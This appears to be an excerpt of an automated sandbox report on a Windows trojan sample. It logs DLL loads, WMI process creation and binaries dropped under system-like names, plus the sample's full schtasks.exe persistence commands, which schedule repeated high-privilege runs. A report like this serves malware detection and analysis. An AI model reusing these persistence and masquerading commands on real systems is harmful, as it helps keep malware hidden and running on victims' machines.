            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347ACF3838_2_00007FFD347ACF38
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeCode function: 38_2_00007FFD347B5E6038_2_00007FFD347B5E60
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD34785E6040_2_00007FFD34785E60
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD3479A25D40_2_00007FFD3479A25D
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD34785DFA40_2_00007FFD34785DFA
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD34788FD340_2_00007FFD34788FD3
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD3477356540_2_00007FFD34773565
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeCode function: 40_2_00007FFD3477CF2840_2_00007FFD3477CF28
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD34785E6041_2_00007FFD34785E60
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD34785DFA41_2_00007FFD34785DFA
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD34788FD341_2_00007FFD34788FD3
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD3477356541_2_00007FFD34773565
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD3477CF2841_2_00007FFD3477CF28
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD3479A25D41_2_00007FFD3479A25D
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD3479AF9241_2_00007FFD3479AF92
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeCode function: 41_2_00007FFD34799CE941_2_00007FFD34799CE9
            Source: XPC5PMKegV.exe, 00000000.00000000.2103762152.0000000000B66000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131937856.000000001B870000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131899690.000000001B850000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131854370.000000001B830000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128895681.0000000002D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exeBinary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.csCryptographic APIs: 'CreateDecryptor'
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.csCryptographic APIs: 'CreateDecryptor'
            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.csCryptographic APIs: 'TransformBlock'
            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@42/29@0/1
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMutant created: NULL
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeMutant created: \Sessions\1\BaseNamedObjects\Local\865a90ef9879085fae9371076bbb0e052cb82423
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile created: C:\Users\user\AppData\Local\Temp\bNV1sCNsUHJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Source: XPC5PMKegV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: XPC5PMKegV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: XPC5PMKegV.exeReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeFile read: C:\Users\user\Desktop\XPC5PMKegV.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\XPC5PMKegV.exe "C:\Users\user\Desktop\XPC5PMKegV.exe"
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Recovery\xMLVfJVxhYAkoCJ.exe C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Source: unknownProcess created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: unknownProcess created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: version.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Recovery\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
